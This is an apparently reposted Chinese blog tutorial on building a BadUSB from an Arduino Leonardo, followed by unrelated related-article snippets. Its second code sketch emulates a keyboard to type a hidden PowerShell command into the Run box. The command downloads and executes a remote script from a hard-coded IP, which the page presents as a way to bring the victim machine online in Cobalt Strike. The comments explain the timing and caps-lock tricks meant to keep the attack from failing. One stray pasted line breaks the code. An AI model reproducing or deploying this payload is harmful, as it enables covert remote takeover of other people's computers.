BadUsb使用

news2024/9/23 15:30:30

1 IDE下载

地址:Software | Arduino

2 开发版驱动安装

linux和mac版本会自动识别提示你安装开发板,驱动貌似不需要额外安装

win需要根据板子型号去下载安装驱动  如

Arduino驱动的安装教程-DFRobot产品资料库

默认会提示你根据你插入的设备进行提示下载,以下为手工操作

开发板选择

串口识别选择

3 编写代码-编译上传

点击红色箭头,先编译后上传到BadUsb

主要实现模拟硬件按键弹出计算器

#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(1000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CALC");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
 
void loop()//循环
{
}

上线CS代码参考:

badusb详细制作教程(两种方式实现远控)_ESQ404的博客-CSDN博客

#include <Keyboard.h>
void setup() {
  Keyboard.begin();
  //向被攻击主机发送信息,伪装成一个USB键盘并准备通讯
  delay(1542);
  //等待1.542秒,因为电脑在把Leonardo识别成键盘并接受输入时会有1~2秒的延迟,也可以看情况修改,防止输入遗漏
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  //按下大写键,防止一些中文输入法的干扰
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');POWERSHELL.EXE -NOP -W HIDDEN -C "iex ((NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://xx.xx.xx.xx:80/A'))"
  
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  //输入windows+r让电脑弹出“运行”输入框
  delay(736);
  //等待0.736秒
  //这里等待的原因是有些速度较慢的电脑在弹出输入框是有延迟,如果不等待直接执行后续代码输入字符的话会出现输入代码不完全的情况,导致攻击失败
  Keyboard.println("POWERSHELL.EXE -NOP -W HIDDEN -C \"iex ((NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING(\'HTTP://43.138.20.48:80/A\'))\"");
  //上一行中println里的大写字母在badusb模拟键盘输入电脑时会转为小写,小写字母则会转为大写
  //所以在修改地址时注意要把大写字母和小写字母转换一下,否则输入代码时会因字母大小写相反导致攻击失败
  //192.168.1.2:80/a换成你自己的地址
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}
void loop() {
}

4 测试

插入win机器即可弹计算器或者上线CS

参考:

BadUSB制作-详细指南 - JE2Se ' Blog

插一个U盘黑一台电脑-Badusb详细教程 - 简书

由Arduino Leonardo初识BadUsb - FreeBuf网络安全行业门户

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/488667.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C++ 中的引用

引用 变量名&#xff0c;本身是一段内存的引用&#xff0c;即别名(alias).引用可以看作一个已定义变量的别名 引用的语法: Tvpe& name var&#xff1b; 类型& 引用变量名称 变量名称 这就是引用变量的定义。&和类型结合称之为引用符号&#xff0c;不是取…

【一起啃书】《机器学习》第六章支持向量机

文章目录 第六章 支持向量机6.1 间隔和支持向量6.2 对偶问题6.3 核函数6.4 软间隔与正则化6.5 支持向量回归6.6 核方法6.7 一些问题 第六章 支持向量机 6.1 间隔和支持向量 给定训练样本集 D { ( x 1 , y 1 ) , ( x 2 , y 2 ) , . . . , ( x m , y m ) } , y i ∈ { − 1 , …

Echarts 自定义y轴value值

在CSDN问答区&#xff0c;碰到一个有意思的问题&#xff0c;解决思路在这里记录一下。 需求为&#xff1a;进行四等份展示&#xff0c;即中间价差值 (最大值 - 最小值) / 4&#xff0c;左侧数据从上到下分别为&#xff1a;最大值、最大值 - (最大值 - 最小值) / 4、最大值 - …

测试工程师用了3个月从月薪8k涨到12k,我是这么做到的?

先说一下自己的个人情况&#xff0c;大专生&#xff0c;18年通过校招进入湖南金蝶软件公司&#xff0c;干了接近3年的测试工程师&#xff0c;今年年初&#xff0c;感觉自己不能够在这样下去了&#xff0c;长时间呆在一个舒适的环境会让一个人堕落&#xff01; 而我已经在一个企…

MySQL知识学习04(MySQL事务隔离级别详解)

1、事务隔离级别总结&#xff1f; SQL 标准定义了四个隔离级别&#xff1a; READ-UNCOMMITTED(读取未提交) &#xff1a; 最低的隔离级别&#xff0c;允许读取尚未提交的数据变更&#xff0c;可能会导致脏读、幻读或不可重复读。READ-COMMITTED(读取已提交) &#xff1a; 允许…

剧本杀游戏app开发

剧本杀游戏app开发通常会涉及以下技术&#xff1a; 开发语言&#xff1a;剧本杀游戏app可以使用各种编程语言进行开发&#xff0c;例如Java、Kotlin、Swift等。 游戏引擎开发&#xff1a;为了实现游戏过程中的角色扮演、对话、动画等效果&#xff0c;需要使用适当的游戏…

Docker-Compose介绍

文章目录 一、Docker-compose 简介二、YAML 文件格式及编写注意事项三、Docker Compose配置常用字段四、Docker Compose 常用命令五、Docker Compose 文件结构六、compose 部署1、Docker Compose 环境安装2、compose部署nginx3、compose部署lnmp 一、Docker-compose 简介 Dock…

odoo 常用小部件及其用法

文章目录 1) 显示百分比2) 标签组件3) handle组件&#xff08;拖拽排序&#xff09;4) 状态栏组件5) binary组件6) 货币组件7) tatinfo组件8) 日期型字段只显示年月 odoo的一些小部件主要定义在&#xff1a;模块/static/src/js下 1) 显示百分比 模型字段execution_percent定义…

api接口如何有效对接

一、背景 在平时工作中&#xff0c;经常会遇到的一种场景是&#xff1a;A公司要对接B公司的API方法&#xff0c;这时&#xff0c;A公司就要阅读B公司的接口文档&#xff0c;从接口文档中找到自己需要对接的API&#xff0c;并根据接口文档的要求&#xff0c;完成编码工作&#…

为什么要建数据仓库,而不是直连数据源?

各位数据的朋友&#xff0c;大家好&#xff0c;我是老周道数据&#xff0c;和你一起&#xff0c;用常人思维数据分析&#xff0c;通过数据讲故事。 今天和大家聊一个话题&#xff1a;为什么BI软件要用构建数据仓库&#xff0c;而不是直连数据源的方式开发报表&#xff1f;&…

docker的底层原理,带你上天

1、docker的层级怎么看 先查看当前机器上有哪些镜像 docker images 这里选看mysql的层级 docker image inspect mysql:5.7.29 命令。其中RootFS部分则是表示了分层信息。 2、查看docker的系统信息 因为这台机器的docker不是我安装的&#xff0c;所以不知道具体的根目录在哪里…

redis之benchmark工具:benchmark是redis自带的性能测试工具

从本篇文章开始&#xff0c;博主将开始对redis的探索&#xff0c;今天的咱们先来聊聊benchmark性能测试工具&#xff0c;通过此工具来检查以下redis的读写能能力以及环境问题。通过此工具可以让我们更清楚的认识到redis具有怎样的能力&#xff0c;是否要进行其他的配置例如&…

【css】CSS层叠样式表二

目录 一、Emmet语法 1、快速生成HTML结构语法 2、快速生成CSS样式语法 3、vscode自动格式化代码 二、CSS的复合选择器 1、什么是复合选择器 1.1后代选择器&#xff08;重要&#xff09; 1.2子选择器&#xff08;重要&#xff09; 1.3并集选择器&#xff08;重要&…

Downie 4 4.6.16 MAC上最新最好用的一款视频下载工具

Downie for Mac 简介 Downie是Mac下一个简单的下载管理器&#xff0c;可以让您快速将不同的视频网站上的视频下载并保存到电脑磁盘里然后使用您的默认媒体播放器观看它们。 Downie 4 下载 Downie 4 for Mac Downie 4 for Mac软件特点 支持许多站点 -当前支持1000多个不同的…

SLAM中将地图映射到谷歌地图上的方法——完美运行

文章目录 前言一、rviz_satellite二、mapviz 前言 老是看到论文中有将地图映射到谷歌地图上的图&#xff0c;实在是泰裤辣&#xff01;&#xff01;&#xff08;武汉大学&#xff09; 搜索了很久&#xff0c;发现有两种可视化软件&#xff0c;分别为rviz_satellite和mapviz。…

换脸ai的方法分享!这几个换脸APP巨好用。​

换脸ai的方法分享&#xff01;换脸AI是一种基于人工智能技术的图像处理应用&#xff0c;它可以将一个人的面部特征和表情应用到另一张照片或视频中&#xff0c;实现快速、高效的人脸替换。这种技术利用机器学习模型分析和学习大量的人脸数据&#xff0c;训练出一种“生成对抗网…

GPU基础与CUDA编程入门

文章目录 一、GPU和CPU的区别GPU&#xff1a; 高吞吐量导向设计CPU&#xff1a; 低延迟导向设计GPU适合什么场景:什么是Prefetch&#xff1f; 二、CUDA与OpenCL三、CUDA编程并行计算整体流程内存模型线程块网格Grid&#xff1a;并行线程块组合线程束SIMD 四、CUDA编程实例&…

ModuleNotFoundError: No module named ‘allennlp‘解决方法

1. 准备工作 由于本人复现论文要安装allennlp的包但是遇到些问题&#xff0c;所以特地记录一下 需求:在SBN环境下安装allennlp的包 1.创建环境 创建一个环境名为SBN的环境名字 python版本为3.8.5 可以根据自己需求指定&#xff0c; conda create -n SBN python3.8.5conda a…

企业微信-构造网页授权链接实现登录

文档地址&#xff1a;构造网页授权链接 - 接口文档 - 企业微信开发者中心 注意&#xff1a; 1.redirect_uri&#xff1a;回调链接地址&#xff0c;需要使用urlencode对链接进行处理 2.scope&#xff1a;如果需要获取成员的头像、手机号等信息需要设为snsapi_privateinfo 例如前…

ChatGPT4.0火爆全球,是什么让它独领风骚?

ChatGPT造就了互联网历史上又一个神话&#xff0c;仅用两个月时间就成功吸引了1亿用户&#xff0c;成为全球互联网应用中增长速度最快的一个。连比尔盖茨都称&#xff1a;ChatGPT的历史意义重大&#xff0c;不亚于PC或互联网诞生。这个热度以至于ChatGPT官网长期都处于满负荷运…